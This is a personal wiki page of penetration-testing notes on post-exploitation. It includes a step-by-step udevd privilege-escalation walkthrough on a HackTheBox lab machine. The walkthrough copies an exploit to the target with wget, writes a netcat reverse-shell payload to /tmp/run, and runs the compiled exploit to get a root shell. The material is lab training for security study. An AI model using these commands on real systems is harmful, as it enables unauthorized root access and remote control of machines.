The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » method_5_post-exploitation
method_5_post-exploitation

This is an old revision of the document!

Table of Contents

Post-Exploitation

Review

The six steps/stages of a PenTest…

  1. Pre-Engagement: Planning & Scope
  2. Recon: Information Gathering
  3. Scanning
  4. Exploitation
  5. Post-Exploitation
  6. Post-Engagement: Report

Overview

Outline of the Post-Exploitation Stage:

  1. Pivot
    1. Horizontal Movement: Lateral Moves
    2. Vertical Movement: Privilege Escalation
  2. Additional Recon
    1. Identify new targets previously not visible
    2. GOAL: Enumeration (build a list of new, potential targets not previously visible)
      • Users: usernames & passwords (cracking: most common post-exploitation attack)
      • Groups: for lateral movement and/or privilege escalation
      • Forest(s): in Active Directory (AD) environments
      • Sensitive Data: because that's why we are here… right?
      • Unencrypted Files: because they contain information we may be able to leverage
  3. Avoid Detection
  4. Exfiltration
  5. Clean-Up
    • Concealment
    • Retain Access

Privilege Escalation

udevd

If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…

Four local Linux exploits using udevd to escalate privileges to root:

  1. Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
  2. Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
  3. Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
  4. Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)

Walk-Through Video described below:

On the target machine, see if udev is running: 

ps ax | grep udevd

On the target machine, check the version of udev; run: 

dkpg -l | grep udev
# On HTB Lame I got version 117-8

Google the udev version or do a searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: The searchsploit results show a Path that is local in: /usr/share/exploitdb/exploits/… 

-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ----------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb
-------------------------------------------------------- ----------------------

First, spin up a web server on hour Kali box (your attack machine, your machine) so we can move the exploit over onto the target box: 

start apache2 service

Copy the exploit file over to the web server subdir: 

cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/

Check & Read:

  • cd into /var/www/html and make sure your file is there. Open it up with an editor and look at what it needs to run.
  • The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
    • Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
    • The exploit will execute /tmp/run (a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.

From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget: 

wget 10.10.14.11/8572  # that's the IP of your Kali/attack machine

Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So… build a text file… 

touch run
echo '#!/bin/sh' >> run
echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run

When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine

You need to compile that .c file you copied to the target machine: 

gcc 8572.c -o 8572  # name it whatever you want

Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target: 

nc -nvlp 5555  # make sure it's the same port number

Now the listener is waiting for a connection on the Kali attack machine…

Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine. 

./8572 2687

You should have a reverse shell on your Kali machine with root privileges on the target machine. Done.

method_5_post-exploitation.1668973248.txt.gz · Last modified: by gman